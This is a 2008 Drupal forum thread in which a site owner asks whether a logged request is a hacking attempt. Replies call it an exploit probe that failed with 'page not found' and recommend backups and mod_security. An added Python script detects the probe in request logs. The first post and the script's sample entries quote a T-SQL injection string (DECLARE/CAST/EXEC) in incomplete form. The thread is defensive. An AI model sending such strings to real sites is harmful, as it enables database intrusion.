A few anonymous users with different IP addresses headed to my site with the following:

?q=node/16\';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S);

Was this a hacking attempt?

Comments

vm’s picture

Someone or something looking for an exploit, yes.

xWhiplash’s picture

Is my site safe?

vm’s picture

I assume, because you didn't state, that the anon user got a page not found?
Have you pasted that path in to see what happens?

It's software, your site is as safe and as secure as possible until the next exploit is found. That said, make frequent backups of your DB and files.

xWhiplash’s picture

Here is the log

Type: page not found
Date: Wednesday, July 23, 2008 - 12:59
User: Anonymous
Location: (link in first post)
Referrer:
Message: (same as link)
Severity: warning
Hostname: (will not post IP)
Operations:

vm’s picture

I believe you hold the answer to your own question.

The path was a page not found.

gonefishing’s picture

Use Mod_Security, an Apache module. The module blocks the "GET" request and Drupal never receives it. This looks like a botnet, I'm getting hit from IPs worldwide.
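
One way to check a request log for the probe quoted in the first post, as an added example that is not part of the original thread: it URL-decodes each requested path, matches the DECLARE / SET ... CAST / EXEC sequence, and lists the distinct hosts that sent it. The sample entries, host addresses and hex literal are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# T-SQL sequence from the quoted request: declare a variable, fill it from
# CAST(<payload> AS CHAR/VARCHAR(n)), then EXEC that same variable.
PROBE = re.compile(
    r"DECLARE\s+@(\w+)\s+N?(?:VAR)?CHAR\(\d+\)\s*;"
    r"\s*SET\s+@\1\s*=\s*CAST\((.*?)\s+AS\s+N?(?:VAR)?CHAR\(\d+\)\)\s*;"
    r"\s*EXEC\s*\(\s*@\1\s*\)",
    re.IGNORECASE | re.DOTALL,
)

# Constructed payload stand-in: the hex encoding of the text "SELECT 1".
HEX = "0x53454C4543542031"

# Constructed sample entries (host, requested URI); hosts are documentation addresses.
SAMPLE = [
    ("192.0.2.10", "/?q=node/16"),
    ("198.51.100.7", "/?q=node/16\\';DECLARE%20@S%20CHAR(4000);"
                     "SET%20@S=CAST(" + HEX + "%20AS%20CHAR(4000));EXEC(@S);"),
    ("203.0.113.44", "/?q=node/3';declare%20@t%20varchar(255);"
                     "set%20@t=cast(" + HEX + "%20as%20varchar(255));exec(@t);--"),
    ("192.0.2.10", "/?q=user/login"),
    # Benign search that merely contains the word "declare".
    ("203.0.113.44", "/index.php?q=search/node/declare%20independence"),
]

def classify(uri):
    """Return details of the probe found in `uri`, or None if it is absent."""
    decoded = unquote(uri)
    if "%" in decoded:  # second pass for double-encoded input (%2520 -> %20 -> space)
        decoded = unquote(decoded)
    match = PROBE.search(decoded)
    if not match:
        return None
    payload = match.group(2).strip()
    return {
        "variable": match.group(1),
        "hex_literal": bool(re.fullmatch(r"0x[0-9A-Fa-f]+", payload)),
        "payload_chars": len(payload),
    }

def summarize(entries):
    """Count probe requests and collect the distinct hosts that sent them."""
    hits = [host for host, uri in entries if classify(uri)]
    return {"requests": len(entries), "probes": len(hits), "hosts": sorted(set(hits))}

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

The pattern requires the same variable name in all three statements, so a request that only mentions one of the keywords is not counted.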